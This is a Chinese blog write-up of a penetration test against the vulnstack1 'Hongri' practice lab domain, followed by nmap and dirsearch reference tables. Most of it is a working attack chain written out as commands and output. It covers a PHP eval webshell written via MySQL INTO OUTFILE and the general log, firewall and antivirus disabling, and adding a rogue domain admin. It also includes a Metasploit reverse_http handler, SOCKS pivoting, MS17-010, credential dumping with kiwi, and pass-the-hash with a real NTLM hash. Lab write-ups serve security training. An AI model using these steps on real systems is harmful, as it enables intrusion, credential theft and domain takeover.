vulnstack1 红日靶场渗透详解

这篇具有很好参考价值的文章主要介绍了vulnstack1 红日靶场渗透详解。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录
  • 环境搭建
  • 信息收集
  • PhpMyAdmin 后台 Getshell
    • into outfile
    • Mysql日志文件写入shell
  • CS后渗透
  • MSF后渗透
  • 知识补充
    • nmap
      • 参数分类
      • 参数速查表
    • dirsearch

环境搭建

ip段设置

kali (coleak):192.168.145.139
Windows 7 (stu1):192.168.10.181、192.168.145.140
Winserver 2008 (owa):192.168.10.180
Win2k3 (root-tvi862ubeh):192.168.10.182

kali可以访问win7,但不能直接访问win08和win2k3

开启win7 web/mysql服务

信息收集

端口扫描

sudo nmap -sS -p 1-65535 -v 192.168.145.140

80/tcp open http
3306/tcp open mysql

web目录扫描

dirsearch -u http://192.168.145.140/

vulnstack1 红日靶场渗透详解

爆破登录

访问80端口是一个phpStudy 探针,结合phpinfo.php和探针知晓主目录在C:/phpStudy/WWW

bp爆破mysql的root弱口令获得root的密码

进入phpmyadmin,用root/root尝试登录成功

PhpMyAdmin 后台 Getshell

phpmyadmin有两种getshell方式

  • into outfile导出木马
  • 利用Mysql日志文件getshell

into outfile

需看要secure_file_priv的值。 当value为“null”时,不允许读取任意文件,当value为“空”时,允许读取任意文件,value可也已设置为其他路径。

select @@basedir;   #查看一下网站的路径 C:/phpStudy/MySQL/
select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/hack.php';
show global variables like '%secure%';    #secure_auth OFF;secure_file_priv NULL

当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,这里为NULL。所以into outfile写入木马出错。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini 文件,在[mysqld]内加入secure_file_priv =""。(windows下修改配置文件:mysql.ini linux修改配置文件:my.cnf)

Mysql日志文件写入shell

show variables like '%general%';   #查看日志状态:
SET GLOBAL general_log='on';    #开启 general_log
SET GLOBAL general_log_file='C:/phpStudy/www/hack.php';    
#指定日志写入到网站根目录的 hack.php 文件
show variables like '%general%';
general_log ON
general_log_file C:/phpStudy/www/hack.php
SELECT '<?php eval($_POST["cmd"]);?>'; 即可将一句话木马写入 hack.php 文件中

vulnstack1 红日靶场渗透详解

CS后渗透

上传免杀后门qm.exe上线cs

vulnstack1 红日靶场渗透详解

关闭防火墙

#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

#关闭防火墙
netsh firewall set opmode disable   			#winsows server 2003 之前
netsh advfirewall set allprofiles state off 	#winsows server 2003 之后

netsh advfirewall show allprofile state //展示状态
netsh advfirewall set allprofiles state off //关闭防火墙

查看用户为god\administrator域管权限,收集域内信息

net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域(域名获取)
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)
网络扫描、端口扫描
抓取hash和明文密码,然后查看密码凭证
net view	#\\OWA \\ROOT-TVI862UBEH  还有两台主机
jump psexec OWA smb
jump psexec root-tvi862ubeh smb
三台主机全部上线

选择psexec横向移动
vulnstack1 红日靶场渗透详解

网络拓扑图如下

vulnstack1 红日靶场渗透详解

VPN部署

vulnstack1 红日靶场渗透详解

sudo ifconfig phear0 192.168.10.0/24
ping 192.168.10.180
nmap 192.168.10.167 -sT -A -p 445

代理远程桌面

// 添加test用户net user test p-0p-0p-0 /add /domain
// 把 test 用户添加进域管理员组net group "domain admins" test /add /domain
// 查看域管理员net group "domain admins" /domain
rdesktop 192.168.10.180
god\test p-0p-0-p-0

MSF后渗透

CS派生会话给MSF

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.145.139
set lport 4566
run

vulnstack1 红日靶场渗透详解

新建会话到该新建的监听器

查看主机是否运行在虚拟机上

run post/windows/gather/checkvm

关闭掉目标主机的杀毒软件,通过命令

run post/windows/manage/killav

获取目标主机的详细信息

sysinfo

meterpreter > sysinfo
Computer : STU1
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : GOD
Logged On Users : 3
Meterpreter : x86/windows

Meterpreter支持非常多的文件系统命令(基本跟Linux系统命令类似),一些常用命令如下:

pwd:当前所在位置
ls:获取当前目录下的文件
cd:切换目标目录;
cat:读取文件内容;
rm:删除文件;
edit:使用vim编辑文件
mkdir:新建目录;
rmdir:删除目录;
upload file 命令则能够向目标系统上传文件。
download file 命令可以帮助我们从目标系统中下载文件

获取内网网段信息

run get_local_subnets

# 可以用模块自动添加路由
run post/multi/manage/autoroute
#添加一条路由
run autoroute -s 192.168.10.0/24
#查看路由添加情况
run autoroute -p

Subnet Netmask Gateway


169.254.0.0 255.255.0.0 Session 1
192.168.10.0 255.255.255.0 Session 1
192.168.145.0 255.255.255.0 Session 1

配置并启用隧道

use auxiliary/server/socks_proxy
set SRVPORT 8999
setg Proxies socks5:192.168.145.139:8999
setg ReverseAllowProxy true

横向移动

background
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.10.181
set ports 80,135-139,445,3306,3389
run

[+] 192.168.10.181: - 192.168.10.181:80 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:135 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:139 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:445 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:3306 - TCP OPEN
[+] 192.168.10.181: - 192.168.10.181:3389 - TCP OPEN

set rhosts 192.168.10.182
run

[+] 192.168.10.182: - 192.168.10.182:135 - TCP OPEN
[+] 192.168.10.182: - 192.168.10.182:139 - TCP OPEN
[+] 192.168.10.182: - 192.168.10.182:445 - TCP OPEN

有445端口,尝试永恒之蓝ms17-010攻击

漏洞扫描

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.10.181
run

利用(内网环境,需要正向shell连接)

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.10.181
run

并没有拿到shell,ms17-010直接拿到shell的情况并不多,成功率不高

哈希传递攻击(PTH)

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

ps:ms6中 mimikatz模块已经合并为kiwi模块

load kiwi

creds_all  #列举所有凭据
creds_kerberos  #列举所有kerberos凭据
creds_msv  #列举所有msv凭据
creds_ssp  #列举所有ssp凭据
creds_tspkg  #列举所有tspkg凭据
creds_wdigest  #列举所有wdigest凭据
dcsync  #通过DCSync检索用户帐户信息
dcsync_ntlm  #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create  #创建黄金票据
kerberos_ticket_list  #列举kerberos票据
kerberos_ticket_purge  #清除kerberos票据
kerberos_ticket_use  #使用kerberos票据
kiwi_cmd  #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam  #dump出lsa的SAM
lsa_dump_secrets  #dump出lsa的密文
password_change  #修改密码
wifi_list  #列出当前用户的wifi配置文件
wifi_list_shared  #列出共享wifi配置文件/编码

抓取失败了,emmmm,重新上线cs抓取

[00000003] Primary
	 * Username : Administrator
	 * Domain   : GOD
	 * NTLM     : 8a963371a63944419ec1adf687bb1be5

psexec|hash传递

在 Metasploit 中,经常使用于哈希传递攻击的模块有:

auxiliary/admin/smb/psexec_command   #在目标机器上执行系统命令
exploit/windows/smb/psexec           #用psexec执行系统命令
exploit/windows/smb/psexec_psh       #使用powershell作为payload

探测445

use auxiliary/scanner/smb/smb_version 
set rhost 192.168.10.180
set threads 40
run
set rhost 192.168.10.182
run

exploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008

use exploit/windows/smb/psexec
set rhosts 192.168.10.181
set SMBUser administrator 
set smbpass 00000000000000000000000000000000:8a963371a63944419ec1adf687bb1be5
run

知识补充

nmap

参数分类

主机发现

-sL 						   仅列出指定网络的每个主机,不发送探测
-sn 						   在发现主机后不进行端口探测
-Pn 						   将所有主机视为在线,不进行主机发现,由ICMP回显请求、TCP SYN 到端口 443、TCP ACK 到端口 80 和 ICMP 默认情况下的时间戳请求组成
-PS/-PA/-PU/-PY  <port> 		对给定端口进行TCP的SYN/ACK,UDP 或 SCTP扫描,参数和端口之间不能有空格 
-PE/-PP/-PM                     ICMP回显,时间戳和网络掩码请求探测
-PO <协议列表> 					发送具有指定协议编号的IP数据包
--disable-arp-ping或--send-ip 	对于本地以太网上的主机不进行ARP扫描,而是IP地址扫描,默认是ARP
--discovery-ignore-rst 			不理RST回复,有时防火墙会欺骗RST回复,而响应对不存在的地址的探测
--traceroute 					路由跟踪扫描
-A                         此选项设置包含了1-10000的端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测
-6                         使用IPv6

端口扫描

-sU 						    UDP扫描
-sT 						    TCP扫描
-sS						        SYN半开放扫描
-sN 						    TCP空扫描,如果向关闭端口发送不包含RST的请求,将回复RST作为响应
-sF 						    FIN标志的数据包扫描
-b <FTP中继主机>				  FTP退回扫描(<用户名>:<密码>@<服务器>:<端口>),一种利用FTP服务器的间接扫描
-sX 						    圣诞树扫描
-sA 						    TCP ACK扫描,探测端口是否被防火墙屏蔽
-sW 						    TCP窗口扫描,这与ACK扫描相同,但通过TCP窗口字段检测端口是否开放,准确率不高
-sM 						    TCP迈蒙扫描,以起发现者命名
-sI 						    TCP空闲扫描,一种间接的扫描
--scanflags <要设置的TCP标注位> 	可以自己指定TCP标志位,还可以同时设置TCP扫描类型(-sA,-sF)以告诉nmap如何解释响应
-sY 						    SCTP INIT扫描即SCTP初始化扫描
-sZ 						    SCTP COOKIE ECHO扫描,开放的端口将丢弃包含COOKIE ECHO的数据包,但端口是关闭将回复ABORT
-sO 						    扫描端口支持的IP协议
-Pn -sn 						跳过主机发现和端口扫描,但仍可以运行NSE(脚本)
-sP						        用类似ping扫描

服务和系统探测

-sV 						Version版本检测扫描, 用来扫描目标主机和端口上运行的软件的版本
--version-intensity 		设置版本扫描的强度0-9,默认7,强度越高准确率越高时间越长
--version-all 				尝试每个强度的探测
--version-trace 			显示详细的版本扫描活动
--allports 					默认nmap版本扫描时不扫一些端口,这将扫所有端口
-O 						    操作系统类型的探测
--osscan-guess(--fuzzy)     猜测匹配操作系统,配合-O
--osscan-limit				限制Nmap只对有希望确定的主机的进行OS探测(至少需确知该主机分别有一个open和closed的端口)
--max-os-trys 				设置对目标的最大尝试次数,默认5

脚本

-sC 						    默认脚本扫描,即--script=default,这些脚本具有入侵性
--script <filename>|<category>|<directory>/|<expression>[,...]  每元素首先被解释为表达式,然后被解释为类别,并且 最后作为文件或目录名称。
--script-args  				    为脚本提供参数
--script-args-file <filename> 	从文件向脚本通过参数
--script-help 					获取脚本说明
--script-updatedb 				更新找到的脚本数据库

设置时序和性能

--min-hostgroup <number>;--max-hostgroup <number>    	nmap是一次性扫描一个组的主机,这设置一个组的最大和最小自己数
--host_timeout 					设置扫描一台主机的时间,以毫秒为单位,默认无时限
-T  <0-5>   					设置时间模版  paranoid (0)、sneaky (1)、polite (2)、normal(3)、 aggressive (4)、insane (5)
paranoid、sneaky模式用于IDS躲避
Polite模式降低了扫描速度以使用更少的带宽和目标主机资源。
Normal为默认模式,因此 -T 3  实际上是未做任何优化。
Aggressive模式假设用户具有合适及可靠的网络从而加速扫描. 
nsane模式假设用户具有特别快的网络或者愿意为获得速度而牺牲准确性

扫描结果

open  					端口开放
closed 					端口是关闭
filtered 				端口被防火墙IDS/IPS屏蔽,不能确定状态
unfiltered 				端口没被屏蔽,但是否开放还要进一步确定
open|filtered 			端口是开放或被屏蔽,Nmap不能识别
closeed|filtered 		端口是关闭或被屏蔽,Nmap不能识别

设置输出文章来源地址https://www.toymoban.com/news/detail-661951.html

-oN <文件>    				输出到文件
-oX <文件>  				输出到XML文件
-oG grep-output.txt  		扫描的结果输出到屏幕,同时会存储一份到grep-output.txt
-v(-vv) <级别>             详细输出扫描
 -d <级别>					设置调试级别,当即使是详细模式也无法提供足够的数据时,调试可用于提供更多内容
--reason 					显示主机和端口状态原因
--open						仅显示打开或可能打开的端口
-append-output				附加到而不是清空输出文件,为输出格式标志指定文件名时 例如 -oX 或 -oN,即 文件默认被覆盖

参数速查表

参数(区分大小写) 说明
-sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。
-sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。
-sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式
-sP ping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描。
-sU UDP扫描,但UDP扫描是不可靠的
-sA 这项高级的扫描方法通常用来穿过防火墙的规则集
-sV 探测端口服务版本
-Pn 扫描之前不需要用ping命令,有些防火墙禁止ping命令。可以使用此选项进行扫描
-v 显示扫描过程,推荐使用
-h 帮助选项,是最清楚的帮助文档
-p 指定端口,如“1-65535、1433、135、22、80”等
-O 启用远程操作系统检测,存在误报
-A 全面系统检测、启用脚本检测、扫描等
-oN/-oX/-oG 将报告写入文件,分别是正常、XML、grepable 三种格式
-T4 针对TCP端口禁止动态扫描延迟超过10ms
-iL 读取主机列表,例如,“-iL C:\ip.txt”

dirsearch

采用默认设置扫描目标url
python3 dirsearch.py -u https://target

使用文件拓展名为php,html,js的字典扫描目标url
python3 dirsearch.py -e php,html,js -u https://target

采用指定路径的wordlist且拓展名为php,html,js的字典扫描目标url
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist

递归扫描
python3 dirsearch.py -e php,html,js -u https://target -r

设置递归层数为3
python3 dirsearch.py -e php,html,js -u https://target -r -R 3

指定线程(不建议线程数调整过大,可能会影响扫描的结果)
python3 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30

到了这里,关于vulnstack1 红日靶场渗透详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnstack靶场实战(一)

    搭建好靶场后 包括win7的web端,还有win2003为域成员,域控为win2008 win7内网ip:192.168.157.153 外网ip:192.168.52.143 域成员 win2003 ip 192.168.52.141 域控 win2008 ip 192.168.52.138 一、webshell的拿取 1、 首先网址访问192.168.52.143,发现是php探针页面 2、 打开御剑进行目录扫描,扫描到后台地址,

    2024年02月04日
    浏览(21)
  • 红日靶场5

    目录 前言 外网渗透 信息收集 1、arp探测 2、nmap 3、nikto 4、whatweb 5、gobuster 6、dirsearch 漏洞探测 ThinKPHP漏洞 漏洞利用 get shell 内网渗透 信息收集 CS 启动! CS连接 CS信息收集 1、hashdump 2、猕猴桃 3、端口扫描 MSF启动! MSF木马生成 MSF监听模块 MSF信息收集 1、添加内网路由 2、引入

    2024年01月16日
    浏览(29)
  • 红日靶场1

    靶场环境搭建 机器名称 外网IP(模拟外网) 内网IP(模拟内网) 攻击机器 192.168.142.133 Win7机器 192.168.142.210 192.168.140.210 Win Server 2008机器(DC) 192.168.140.220 Win Server 2003机器 192.168.140.230 坑点 (1)在Win7机器上打开phpstudy时,第一次会出现报错,需要重启一下Win7机器。 1、通过

    2024年02月08日
    浏览(31)
  • 红日靶场2

    1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入 2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.

    2023年04月16日
    浏览(22)
  • 红日靶场四

    目录 环境搭建 环境说明 官方描述 外网信息收集与利用 struts2漏洞 Tomcat漏洞  docker逃逸 提权  内网渗透 扫描内网主机端口 端口转发 利用永恒之蓝获得win7  mimikatz抓取密码  域横向移动 利用Kerberos 域用户提权漏洞获得域控WIN2008 上传msf马到域控   mimikatz抓取密码 远程登陆域

    2024年02月03日
    浏览(31)
  • 红日ATT&CK系列靶场(-)简记

    Step 1》信息收集 nmap 发现80、 3306 nmap -T4 -O 192.168.92.100 访问80端口 dirsearch(御剑)扫描 发现:/phpMyadmin Step 2 》漏洞利用 1.弱口令 http://192.168.92.100/phpMyadmin root/root 登录成功 2.getshell select @@basedir //查绝对路径 into outfile 写马 select \\\'?php eval($_POST[cmd]);?\\\' into outfile \\\'C://绝对路径/shell.

    2024年02月09日
    浏览(35)
  • 红日靶场2 ATT&&CK攻击

    360免杀其实没有你想象的那么难 首先最重要的是 你要用免杀脚本对你所生成的木马病毒进行加密 然后加密系统的内核,就是上一篇文章所提及的 是通过两次加密之后 所输出的结果,让360无法感知到,然后先通过java反序列化工具将冰蝎工具的JSP后门代码上传上去,这个不会

    2024年01月18日
    浏览(34)
  • 红日靶场2 指免杀360 个人学习记录

    360安全卫士,有一说一,确实很强,这几天研究的MSF利用java反序列化的漏洞是无法利用的,其他方法也瘦小甚微 前几天在研究用 用免杀工具 go-shellcode-loader-main免杀工具对我们生成的木马进行加密 本来是用csa4.0黑客工具生成了一个jsp的恶意代码 我首先要承认,微软自带的病

    2024年01月16日
    浏览(27)
  • 渗透学习-靶场篇-WebGoat靶场(JWT攻击)

    本次主要学习了javaweb项目方面任意出现的一些安全问题,最主要的是有关于JWT身份认证上的攻击,并利用webgoat靶场进行了一些实验。 JWT的全称是Json Web Token。它遵循JSON格式,将用户信息加密到token里,服务器不保存任何用户信息,只保存密钥信息,通过使用特定加密算法验

    2023年04月21日
    浏览(36)
  • Noob 靶场渗透记录

    一、ip arp-scan扫靶场ip 1、攻击机:Kali ip:192.168.142.128 ​ 靶机:? ip:192.168.56.136 二、日常扫端口 发现开放端口为21 ftp / 80 tcp / 55077 ssh 老规矩,先进入网页一看 是一个登录页,但是现在还没有用户名和密码,去ftp看看 里面两个文件,先下载下来看看。第一个文件里是一串加

    2024年02月08日
    浏览(27)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包